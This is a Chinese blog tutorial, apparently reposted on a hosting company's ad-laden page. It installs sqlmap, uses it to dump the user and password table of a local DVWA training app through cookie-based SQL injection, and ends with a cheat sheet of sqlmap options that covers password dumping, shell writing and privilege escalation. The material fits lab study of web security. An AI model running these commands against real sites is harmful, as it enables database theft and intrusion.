一 前期準(zhǔn)備
創(chuàng)新互聯(lián)主營蕭縣網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營網(wǎng)站建設(shè)方案,
手機(jī)APP定制開發(fā),蕭縣h5
重慶小程序開發(fā)搭建,蕭縣網(wǎng)站營銷推廣歡迎蕭縣等地區(qū)企業(yè)咨詢
1 sqlmap在windows環(huán)境下需要python2.7的支持,在python官網(wǎng)下載即可
https://www.python.org/
2 安裝python2.7����,默認(rèn)即可��。安裝完成后需要配置下環(huán)境變量���。右擊計(jì)算機(jī)->高級(jí)系統(tǒng)設(shè)置->環(huán)境變量���,找到系統(tǒng)變量的Path選項(xiàng),雙擊�,在最后添加;C:\Python27“;”必須要有�,如果有其他python,可以刪掉����。這是我的安裝路徑���。
3 按windows+R,輸入cmd打開dos界面�����,輸入python進(jìn)行測(cè)試python是否安裝成功�。
返回python版本號(hào),安裝成功
4 下載sqlmap���,可以到我的百度云下載:http://pan.baidu.com/s/1skPClzR密碼:ndpj��。
解壓后�,改名為sqlmap�,放到磁盤中
5 打開cmd,切換到sqlmap對(duì)應(yīng)磁盤
6 至此���,sqlmap安裝完畢
二 開始爆庫
1 將dvwa安全級(jí)別設(shè)置為low��,采用的是cookie注入�����。點(diǎn)擊sql注入��,使用burpsuite抓包拿cookie
2 url和cookie都需要使用���,打開剛才開的cmd���,鍵入
Sqlmap.py -u“http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie“security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1” --risk 3 --level 5 ,中途出現(xiàn)選擇項(xiàng)直接回車
3 明顯看到有mysql數(shù)據(jù)庫,先將數(shù)據(jù)庫顯示出來sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" --dbs
4 可以看到有幾個(gè)數(shù)據(jù)庫��,然后選擇dvwa數(shù)據(jù)庫�,列表名
sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa --tables
5 出現(xiàn)兩個(gè)表名�����,肯定有用的是users表名�,然后暴列名
sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users --columns
6 看到了很多列名,最有用的當(dāng)然是用戶和密碼了���,導(dǎo)出用戶和密碼
sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users -C user,password,user_id --dump
7 好了至此完畢�,接下來是sqlmap的命令解釋大全
-u #注入點(diǎn)
-g 谷歌搜索
-f #指紋判別數(shù)據(jù)庫類型
-b #獲取數(shù)據(jù)庫版本信息
-p #指定可測(cè)試的參數(shù)(?page=1&id=2 -p“page,id”)
-D “”#指定數(shù)據(jù)庫名
-T “”#指定表名
-C “”#指定字段
-s “”#保存注入過程到一個(gè)文件,還可中斷��,下次恢復(fù)在注入(保存:-s“xx.log” 恢復(fù):-s“xx.log” –resume)
–columns #列出字段
–current-user #獲取當(dāng)前用戶名稱
–current-db #獲取當(dāng)前數(shù)據(jù)庫名稱
–users #列數(shù)據(jù)庫所有用戶
–passwords #數(shù)據(jù)庫用戶所有密碼
–privileges #查看用戶權(quán)限(–privileges -U root)
-U #指定數(shù)據(jù)庫用戶
–dbs #列出所有數(shù)據(jù)庫
–tables -D“”#列出指定數(shù)據(jù)庫中的表
–columns -T“user”-D“mysql”#列出mysql數(shù)據(jù)庫中的user表的所有字段
–dump-all #列出所有數(shù)據(jù)庫所有表
–exclude-sysdbs #只列出用戶自己新建的數(shù)據(jù)庫和表
–dump -T“”-D“”-C“”#列出指定數(shù)據(jù)庫的表的字段的數(shù)據(jù)(–dump -T users -D master -C surname)
–dump -T“”-D“” –start 2–top 4 #列出指定數(shù)據(jù)庫的表的2-4字段的數(shù)據(jù)
–dbms #指定數(shù)據(jù)庫(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)
–os #指定系統(tǒng)(Linux,Windows)
--sql -shell 寫shell
--delay 延遲的時(shí)間
--safe-freq 次數(shù)
-v #詳細(xì)的等級(jí)(0-6)
0:只顯示Python的回溯�����,錯(cuò)誤和關(guān)鍵消息。
1:顯示信息和警告消息���。
2:顯示調(diào)試消息�。
3:有效載荷注入����。
4:顯示HTTP請(qǐng)求。
5:顯示HTTP響應(yīng)頭��。
6:顯示HTTP響應(yīng)頁面的內(nèi)容
–privileges #查看權(quán)限
–is-dba #是否是數(shù)據(jù)庫管理員
–roles #枚舉數(shù)據(jù)庫用戶角色
–udf-inject #導(dǎo)入用戶自定義函數(shù)(獲取系統(tǒng)權(quán)限)
–union-check #是否支持union注入
–union-cols #union查詢表記錄
–union-test #union語句測(cè)試
–union-use #采用union注入
–union-tech orderby #union配合order by
另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn��,海內(nèi)外云服務(wù)器15元起步�����,三天無理由+7*72小時(shí)售后在線���,公司持有idc許可證�,提供“云服務(wù)器��、裸金屬服務(wù)器����、高防服務(wù)器��、香港服務(wù)器��、美國服務(wù)器����、虛擬主機(jī)�、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定�、簡(jiǎn)單易用、服務(wù)可用性高�����、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì)�,專為企業(yè)上云打造定制����,能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求����。
本文名稱:記一次初級(jí)dvwa爆庫-創(chuàng)新互聯(lián)
當(dāng)前網(wǎng)址:
http://weahome.cn/article/hocip.html
重慶分公司
重慶分公司
